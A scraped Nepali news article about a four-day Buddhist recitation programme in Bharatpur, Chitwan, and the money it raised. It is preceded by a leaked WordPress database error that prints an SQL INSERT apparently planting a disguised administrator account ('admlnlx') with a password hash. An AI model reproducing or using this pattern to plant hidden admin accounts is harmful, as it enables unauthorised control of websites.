WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfwqlP0V0ZFWjWMypM9ySv49IYgiL61', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 12:40:53', '', 'admlnlx', 'admlnlx')
चितवन, माघ ८–
बौद्ध धर्म सेवा समिति भरतपुर चितवनद्वारा आयोजित चार दिने भगवान बुद्धका बचन प्रज्ञा पारमिता (ह्युँपति) पाठबाचन कार्यक्रम सम्पन्न भएको छ ।
माघ ५ गतेदेखि सुरु भएको कार्यक्रम शनिबार सम्पन्न भएको हो । महाबौद्ध गुम्बा भरतपुरका प्रमुख लामा गुरु आचार्य भिक्षु सोनम गुरुङसहित १७ जना धर्म गुरुहरुले पाठ वाचन गरेका थिए ।
बौद्ध धर्म सेवा समिति चितवनको वार्षिक कार्ययोजनाअनुसार आयोजना गरिएको कार्यक्रममार्फत चार लाख ५० हजार १५ रुपैयाँ आर्थिक संकलन भएको भएको समितिका अध्यक्ष गणेशबहादुर गुरुङले जानकारी दिए । संकलित रकम धर्मगुरुहरुलाई दक्षिणा तथा गुम्बा व्यवस्थापनमा खर्च हुँदै आएको उनले बताए । मानिसहरुमा ग्रह शान्ति हुने विश्वासका आधारमा यस पाठ बाचनमा सहभागी हुने गर्दछन् ।